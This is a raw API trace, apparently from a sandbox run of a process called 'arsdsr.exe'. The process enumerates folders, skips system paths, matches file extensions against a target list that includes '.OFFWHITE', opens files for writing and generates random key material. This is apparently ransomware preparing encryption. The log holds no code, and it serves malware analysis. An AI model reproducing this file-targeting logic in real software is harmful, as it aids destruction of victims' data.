lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\" [0148.396] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\" [0148.396] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*") returned="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*" [0148.397] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0148.398] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.398] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0148.398] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.398] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.398] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0148.398] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2=".") returned 1 [0148.398] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="..") returned 1 [0148.398] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="...") returned 1 [0148.398] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="windows") returned -1 [0148.398] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="$recycle.bin") returned 1 [0148.398] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="rsa") returned 1 [0148.398] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="ntuser.dat") returned 1 [0148.398] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="programdata") returned 1 [0148.398] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="appdata") returned 1 [0148.398] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="program files") returned 1 [0148.398] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="program files (x86)") returned 1 [0148.398] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\" [0148.398] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", lpString2="vcRuntimeMinimum_x86" | out: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" [0148.398] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\") returned="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\" [0148.398] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\") returned="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\" [0148.398] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*") returned="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*" [0148.398] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0148.399] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.399] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0148.399] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.399] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.399] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc6500, ftCreationTime.dwHighDateTime=0x1cf3dd3, ftLastAccessTime.dwLowDateTime=0x50cc6500, ftLastAccessTime.dwHighDateTime=0x1cf3dd3, ftLastWriteTime.dwLowDateTime=0x50cc6500, ftLastWriteTime.dwHighDateTime=0x1cf3dd3, nFileSizeHigh=0x0, nFileSizeLow=0xf36be, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0148.399] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0148.399] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0148.399] lstrcmpiW (lpString1="cab1.cab", lpString2="...") returned 1 [0148.399] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0148.399] lstrcmpiW (lpString1="cab1.cab", lpString2="$recycle.bin") returned 1 [0148.399] lstrcmpiW (lpString1="cab1.cab", lpString2="rsa") returned -1 [0148.399] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0148.399] lstrcmpiW (lpString1="cab1.cab", lpString2="programdata") returned -1 [0148.399] lstrcmpiW (lpString1="cab1.cab", lpString2="appdata") returned 1 [0148.399] lstrcmpiW (lpString1="cab1.cab", lpString2="program files") returned -1 [0148.399] lstrcmpiW (lpString1="cab1.cab", lpString2="program files (x86)") returned -1 [0148.399] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\") returned="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\" [0148.399] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", lpString2="cab1.cab" | out: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0148.399] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.399] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.400] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0148.400] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0148.400] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0148.400] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0148.400] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc6500, ftCreationTime.dwHighDateTime=0x1cf3dd3, ftLastAccessTime.dwLowDateTime=0x50cc6500, ftLastAccessTime.dwHighDateTime=0x1cf3dd3, ftLastWriteTime.dwLowDateTime=0x50cc6500, ftLastWriteTime.dwHighDateTime=0x1cf3dd3, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0148.400] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2=".") returned 1 [0148.400] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="..") returned 1 [0148.400] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="...") returned 1 [0148.400] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="windows") returned -1 [0148.400] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="$recycle.bin") returned 1 [0148.400] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="rsa") returned 1 [0148.400] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="ntuser.dat") returned 1 [0148.400] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="programdata") returned 1 [0148.400] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="appdata") returned 1 [0148.400] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="program files") returned 1 [0148.400] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="program files (x86)") returned 1 [0148.400] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\") returned="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\" [0148.400] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", lpString2="vc_runtimeMinimum_x86.msi" | out: lpString1="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned="C:/Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" [0148.400] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.400] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.400] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0148.400] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0148.400] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0148.400] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0148.400] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0148.401] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0148.401] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0148.401] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0148.401] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0148.401] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0148.401] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0148.401] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0148.401] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0148.401] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0148.401] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0148.401] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0148.401] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc6500, ftCreationTime.dwHighDateTime=0x1cf3dd3, ftLastAccessTime.dwLowDateTime=0x50cc6500, ftLastAccessTime.dwHighDateTime=0x1cf3dd3, ftLastWriteTime.dwLowDateTime=0x50cc6500, ftLastWriteTime.dwHighDateTime=0x1cf3dd3, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0148.401] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0148.401] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0148.401] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0148.401] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 0 [0148.401] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0148.401] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd314a0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xecd314a0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", cAlternateFileName="{33D1F~1")) returned 1 [0148.401] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2=".") returned 1 [0148.401] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="..") returned 1 [0148.401] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="...") returned 1 [0148.401] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="windows") returned -1 [0148.402] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="$recycle.bin") returned 1 [0148.402] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="rsa") returned -1 [0148.402] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="ntuser.dat") returned -1 [0148.402] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="programdata") returned -1 [0148.402] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="appdata") returned -1 [0148.402] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="program files") returned -1 [0148.402] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="program files (x86)") returned -1 [0148.402] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0148.402] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" | out: lpString1="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" [0148.402] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\") returned="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\" [0148.402] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\") returned="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\" [0148.402] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*") returned="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*" [0148.402] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd314a0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xecd314a0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0148.402] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.402] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd314a0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xecd314a0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0148.402] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.402] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.402] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecd314a0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd314a0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xf08b3aa0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x28e, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0148.403] lstrcmpiW (lpString1="state.rsm", lpString2=".") returned 1 [0148.403] lstrcmpiW (lpString1="state.rsm", lpString2="..") returned 1 [0148.403] lstrcmpiW (lpString1="state.rsm", lpString2="...") returned 1 [0148.403] lstrcmpiW (lpString1="state.rsm", lpString2="windows") returned -1 [0148.403] lstrcmpiW (lpString1="state.rsm", lpString2="$recycle.bin") returned 1 [0148.403] lstrcmpiW (lpString1="state.rsm", lpString2="rsa") returned 1 [0148.403] lstrcmpiW (lpString1="state.rsm", lpString2="ntuser.dat") returned 1 [0148.403] lstrcmpiW (lpString1="state.rsm", lpString2="programdata") returned 1 [0148.403] lstrcmpiW (lpString1="state.rsm", lpString2="appdata") returned 1 [0148.403] lstrcmpiW (lpString1="state.rsm", lpString2="program files") returned 1 [0148.403] lstrcmpiW (lpString1="state.rsm", lpString2="program files (x86)") returned 1 [0148.403] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\") returned="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\" [0148.403] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", lpString2="state.rsm" | out: lpString1="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" [0148.403] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.403] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.403] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0148.403] lstrcmpiW (lpString1=".rsm", lpString2=".exe") returned 1 [0148.403] lstrcmpiW (lpString1=".rsm", lpString2=".log") returned 1 [0148.403] lstrcmpiW (lpString1=".rsm", lpString2=".cab") returned 1 [0148.403] lstrcmpiW (lpString1=".rsm", lpString2=".cmd") returned 1 [0148.403] lstrcmpiW (lpString1=".rsm", lpString2=".com") returned 1 [0148.403] lstrcmpiW (lpString1=".rsm", lpString2=".cpl") returned 1 [0148.403] lstrcmpiW (lpString1=".rsm", lpString2=".ini") returned 1 [0148.403] lstrcmpiW (lpString1=".rsm", lpString2=".dll") returned 1 [0148.403] lstrcmpiW (lpString1=".rsm", lpString2=".url") returned -1 [0148.403] lstrcmpiW (lpString1=".rsm", lpString2=".ttf") returned -1 [0148.403] lstrcmpiW (lpString1=".rsm", lpString2=".mp3") returned 1 [0148.404] lstrcmpiW (lpString1=".rsm", lpString2=".pif") returned 1 [0148.404] lstrcmpiW (lpString1=".rsm", lpString2=".mp4") returned 1 [0148.404] lstrcmpiW (lpString1=".rsm", lpString2=".OFFWHITE") returned 1 [0148.404] lstrcmpiW (lpString1=".rsm", lpString2=".msi") returned 1 [0148.404] lstrcmpiW (lpString1="state.rsm", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0148.404] GetProcessHeap () returned 0x500000 [0148.404] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526d78 [0148.404] CreateFileW (lpFileName="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0148.405] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=654) returned 1 [0148.405] GetProcessHeap () returned 0x500000 [0148.405] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0148.405] GetProcessHeap () returned 0x500000 [0148.405] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0148.405] GetProcessHeap () returned 0x500000 [0148.405] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0148.405] GetProcessHeap () returned 0x500000 [0148.405] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0148.405] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.405] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.406] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0148.406] 